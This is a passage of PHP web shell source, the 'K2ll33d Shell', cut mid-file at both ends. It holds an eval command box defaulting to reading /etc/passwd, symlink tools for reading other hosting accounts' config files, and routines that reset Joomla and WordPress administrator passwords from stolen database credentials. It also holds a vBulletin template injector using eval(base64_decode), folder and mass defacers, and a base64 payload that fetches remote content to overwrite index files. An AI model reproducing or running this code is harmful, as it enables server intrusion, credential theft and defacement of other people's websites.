echo "y=".$pwd;?>&x=phpinfo">PHP</a><a href="?<?php echo "y=".$pwd;?>&x
=zone-h">Zone-H</a><li><a>Joomla</a><ul><li><a href="?<?php echo "y=".$pwd;?>&am
p;x=joomla">From keyboard</a></li><li><a href="?<?php echo "y=".$pwd;?>&x=js
">From symlink</a></li></ul></li><li><a>Wordpress</a><ul><li><a href="?<?php ech
o "y=".$pwd;?>&x=keyboard">From Keyboard</a></li><li><a href="?<?php echo "y
=".$pwd;?>&x=config">From Symlink</a></li></ul></li><a href="?<?php echo "y=
".$pwd;?>&x=vb">Vb</a><a href="?<?php echo "y=".$pwd;?>&x=domains">Domai
ns</a><a href="?<?php echo "y=".$pwd;?>&x=string">String</a><a href="?<?php
echo "y=".$pwd;?>&x=boom">Boom</a>  </ul></div><br><br>
<?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){?><form action="?y=<?php ec
ho $pwd;?>&x=php" method="post"><table class="cmdbox"><tr><td><textarea clas
s="output" name="cmd" id="cmd" cols=90>
<?php if(isset($_POST['submitcmd'])) {echo eval(magicboom($_POST['cmd']));}else
echo "echo file_get_contents('/etc/passwd');";?></textarea></td></tr><tr><td><in
put style="width:19%;" class="inputzbut" type="submit" value="Do !" name="submit
cmd" /></td></tr></form></table></form> <?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'about')){echo '<center><br><br><div
class="mybox"><br><h2 style="font-size:50px;" class="k2ll33d2">K2ll33d Shell</h2
><k>By K2ll33d<br><br><br><a href=mailto:k2ll33d@live.fr>Mail</a> | <a
href="http://facebook.com/k2ll33d" target="_blank">Facebook</a> | <a
href="http://zone-h.org/archive/notifier=ReZK2LL" target="_blank">Zone-H</a></k>
<br><br><h3 style="font:25px orbitron;color:#ff0000;">'.date('Y').'</h3></div></
center>';}
elseif(isset($_GET['x']) && ($_GET['x'] == 'sf')) {@set_time_limit(0);@mkdir('sy
m',0777);error_reporting(0);$htaccess = "Options all \n DirectoryIndex gaza.htm
l \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/p
lain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$op =@fopen (
'sym/.htaccess','w');fwrite($op ,$htaccess);echo '<center><br><br><br><div class
="mybox"><h2 class="k2ll33d2">Symlinker</h2><br><form method="post"> File Path:<
br><input class="inputz" type="text" name="file" value="/home/user/public_html/c
onfig.php" size="60"/><br>Symlink Name<br><input class="inputz" type="text" name
="symfile" value="s.txt" size="60"/><br><br><input class="inputzbut" type="submi
t" value="symlink" name="symlink" /><br><br></form></div></center>';$target = $_
POST['file'];$symfile = $_POST['symfile'];$symlink = $_POST['symlink'];if ($syml
ink) {@symlink("$target","sym/$symfile");echo '<br><center><a target="_blank" hr
ef="sym/'.$symfile.'" >'.$symfile.'</a><br><br><br><br></center>';}}
elseif(isset($_GET['x']) && ($_GET['x'] == 'js')) {if ($_POST['symjo']) {$config
= file_get_contents($_POST['url']);$user = $_POST['user'];$pass = md5($_POST['p
ass']);function ex($text,$a,$b){$explode = explode($a,$text);$explode = explode(
$b,$explode[1]);return $explode[0];}if($config && ereg('JConfig',$config)){$pssw
d = ex($config,'$password = \'',"';");$username = ex($config,'$user = \'',"';")
;$dbname = ex($config,'$db = \'',"';");$prefix = ex($config,'$dbprefix = \'',"';

");$host = ex($config,'$host = \'',"';");$email = ex($config,'$mailfrom = \'',"'
;");$formn = ex($config,'$fromname = \'',"';");$conn = mysql_connect($host,$user
name,$psswd) or die(mysql_error());mysql_select_db($dbname,$conn) or die($userna
me.' '.$psswd.' '.$host.' '.$dbname);$query = @mysql_query("UPDATE `".$prefix."u
sers` SET ùsername` ='".$user."' , `password` = '".$pass."', ùsertype` = 'Supe
r Administrator', `block` = 0");if ($query) {echo '<center><h2 class="k2ll33d2">
Done !</h2></center><br><table width="100%"><tr><th width="30%">site name</th><t
h width="20%">user</th><th width="20%">password</th><th width="20%">email</th></
tr><tr><td width="20%"><font size="2" color="red">'.$formn.'</font></td><td widt
h="20%">'.$user.'</td><td with="20%">'.$_POST["pass"].'</td><td width="20%">'.$e
mail.'</td></tr></table>';}else {echo '<h2 class="k2ll33d2"><font color="#ff0000
">ERROR !</font></h2>';}}else die('<h2 class="k2ll33d2"><font color="red">Not a
joomla config</font></h2>');}else { ?> <center><br><br><div class="mybox"><form
method="post"><table><h2 class="k2ll33d2">Joomla login changer ( symlink version
)</h2><tr><td>config link : </td><td><input class="inputz" type="text" name="ur
l" value=""></td></tr><tr><td>new user : </td><td><input class="inputz" type="te
xt" name="user" value="admin"></td></tr><tr><td>new password : </td><td><input c
lass="inputz" type="text" name="pass" value="123123"></td></tr><tr><td><br></td>
</tr><tr><td><input type="submit" class="inputzbut" name="symjo" value="change">
</td><br></tr></table></form></div></center><?php }}
elseif(isset($_GET['x']) && ($_GET['x'] == 'sec')){$d0mains = @file("/etc/named.
conf");
if($d0mains){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");
$file3 = 'Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any';
$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);
echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><
td align=center><font size=3>S. No.</font></td><td align=center><font size=3>Dom
ains</font></td><td align=center><font size=3>Users</font></td><td align=center>
<font size=3>Symlink</font></td></tr>";$dcount = 1;foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flu
sh();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/et
c/valiases/".$domains[1][0]));echo "<tr align=center><td><font size=3>" . $dcoun
t . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font cla
ss=txt>".$domains[1][0]."</font></a></td><td>".$user['name']."</td><td><a href='
/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Sym
link</font></a></td></tr>"; flush();$dcount++;}}}echo "</table>";}else{$TEST=@fi
le('/etc/passwd');if ($TEST){@mkdir("k2",0777);@chdir("k2");exe("ln -s / root");
echo "<br><br><table align=center border=1><tr><td align=center><font size=4>S.
No.</font></td><td align=center><font size=4>Users</font></td><td align=center><
font size=4>Symlink</font></td></tr>";$dcount = 1;$file = fopen("/etc/passwd", "
r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$match
es = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_repl
ace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 ||
$matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $
matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $
matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $mat
ches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;e
cho "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><fon
t class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a hre
f=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></t
r>";$dcount++;}fclose($file);echo "</table>";}else{if($os != "Windows"){@mkdir("
k2",0777);@chdir("k2");@exe("ln -s / root");
echo "<br><br><center><div class='mybox'><h2 class='k2ll33d2'>server symlinker</

h2><table align=center border=1><tr><td align=center><font size=4>id</font></td>
<td align=center><font size=4>Users</font></td><td align=center><font size=4>Sym
link</font></td></tr>";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$va
l1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo
'<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);
fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to ope
n file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_mat
ch('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]
);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $mat
ches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch"
|| $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $m
atches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matc
hes == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center>
<font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches .
"</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $match
es . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($fil
e);echo "</table></div></center>";unlink("test.txt");} else echo "<center><font
size=4>Cannot create Symlink</font></center>";}}}
elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')){error_reporting(0);?><center
><br><br><div class="mybox"><h2 class="k2ll33d2">Folder Mass Defacer</h2><center
/><br><center><form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']
?>" method=post>Folder :<br/><input class="inputz" typ=text name=path size=60 va
lue="<?=getcwd();?>"><br>File Name :<br/><input class="inputz" typ=text name=fil
e size=60 value="index.php"><br>index URL :<br/><input class="inputz" typ=text n
ame=url size=60 value=""><br><input class="inputzbut" type=submit value=Deface><
/form></div></center><?php @error_reporting(0);$mainpath=$_POST[path];$file=$_PO
ST[file];$indexurl=$_POST[url];echo "<br>";$dir=opendir("$mainpath");while($row=
readdir($dir)){$start=@fopen("$row/$file","w+");$code=@file_get_contents($indexu
rl);$finish=@fwrite($start,$code);if ($finish){echo "» $row/$file » D
one<br><br>";}}}
elseif(isset($_GET['x']) && ($_GET['x'] == 'vb')) {if(empty($_POST['index'])){ec
ho "<center><br><br><div width='100%' class='mybox'><br><h2 class='k2ll33d2'>Vbu
lletin index changer</h2><br><FORM method='POST'>host : <INPUT size='12' class='
inputz' value='localhost' name='localhost' type='text'> | database : <
INPUT class='inputz' size='12' value='db_name' name='database' type='text'>&nbsp
;| username : <INPUT class='inputz' size='10' value='db_user' name='usernam
e' type='text'> | password : <INPUT class='inputz' size='10' value='bd
_pass' name='password' type='text'> | perfix : <input class='inputz' s
ize='10' value='' name='perfix' type='text'><br><br><textarea class='inputz' nam
e='index' cols='40' rows='10'>Hacked By ReZK2LL Team</textarea><br><INPUT class=
'inputzbut' value='Deface' name='send' type='submit'></FORM></div></center>";}el
se{$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $
_POST['username'];$password = $_POST['password'];$perfix = $_POST['perfix'];$ind
ex = $_POST['index'];@mysql_connect($localhost,$username,$password) or die(mysql
_error());@mysql_select_db($database) or die(mysql_error());$index=str_replace("
\'","'",$index);$set_index = "{\${eval(base64_decode(\'";$set_index .= base64_e
ncode("echo '$index';");$set_index .= "\'))}}{\${exit()}}</textarea>";$ok=@mysql
_query("UPDATE ".$perfix."template SET template ='".$set_index."' WHERE title ='
FORUMHOME'") or die(mysql_error());if($ok){echo "Defaced<br><br>";}}}
elseif(isset($_GET['x']) && ($_GET['x'] == 'boom')){error_reporting(0);function
entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurD
ebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}
function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)
microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp
= substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function inde
x_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre
2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PA
SSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix
= entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('
DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {my

sql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix.
"users` SET ùser_login` = 'admin',ùser_pass` = '4297f44b13955235245b2497399d7a
93' WHERE ÌD` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = m
ysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data
= mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("
SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql
_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT
* from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_f
etch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0
(compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET C
LR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch
, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT
_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie
=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURN
TRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECT
TIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CU
RLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt"
);$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === fa
lse) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<
br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?f
ile=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=them
e';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION,
0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER,
0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOK
IEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0
= curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnon
ce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hi
dden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$o
utput.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/
theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_
POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($conten
t)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");c
url_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSF
ER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $
useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CU
RLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos =
strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output
.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated
Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface '.
file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$
url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl
_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);cur
l_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);cur
l_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR,
"COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = cur
l_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" na
me="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden"
name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.=
"[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-e
ditor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1
);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&ac
tion=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Up
date File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT
_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT
_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_s
etopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close
($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === fa
lse) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Inde
x.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_conte
nts($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$

output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.=
"[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return
array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $c
ontent, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "'
;");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2(
$conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "
';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "
http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($h
ost, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = my
sql_query("UPDATE `".$prefix."users` SET ùsername` ='admin' , `password` = '429
7f44b13955235245b2497399d7a93', ùsertype` = 'Super Administrator', `block` = 0"
);$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query(
"SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home`
= '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req
= mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_
name."' or èlement` = '".$template_name."'");$data = mysql_fetch_array($req);$t
emplate_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init(
);curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION,
1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER,
0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOK
IEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch)
;$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$
hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($re
turn && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_
POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTF
IELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$retur
n."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch,
CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_s
etopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buf
fer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {
$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?op
tion=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php"
);$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOP
T_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch
, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt
($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffe
r = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" v
alue="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<b
r />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hi
dden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl
_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);c
url_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=i
ndex.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANS
FER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT,
$useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_C
OOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,
'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Upd
ating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfu
lly saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefi
x."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$templa
te_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Window
s NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url
."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt
($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);cur
l_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);cu
rl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR
, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hid

den=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden)
{curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_se
topt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task
=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($
ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($
ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); cur
l_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($
buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} els
e {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.ph
p?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt
($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setop
t($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt(
$ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); cu
rl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre
2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$outpu
t.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] in
dex.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index
.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl
_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent="
.$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=s
ave_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($c
h,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch,
CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_s
etopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$po
s = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === fa
lse) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Inde
x.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB
Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$con
d, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr
= "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandl
er server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Re
quire None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@
symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_
match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]
);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><b
r />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANC
iRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yM
DEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpc
m5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb
3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogI
CAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywnd
ysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRle
C5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9D
QpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http:/
/'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$o
utput = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) &&
$_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$
_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION[
'count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;"><tr st
yle="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><t
h>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st'])
&& $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i+
+){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$i
nfos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @f
ile_get_contents($base_url.$infos['name']."/public_html/configuration.php");$con
fig02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php"
);$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wpconfig.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01
&& preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.
($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" targ

et="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOO
MLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td
>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class
="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSIO
N['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span cla
ss="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME
/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="
center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</
a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$r
es = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res
['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwr
ite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2']
+ 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}ech
o '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 &&
preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j
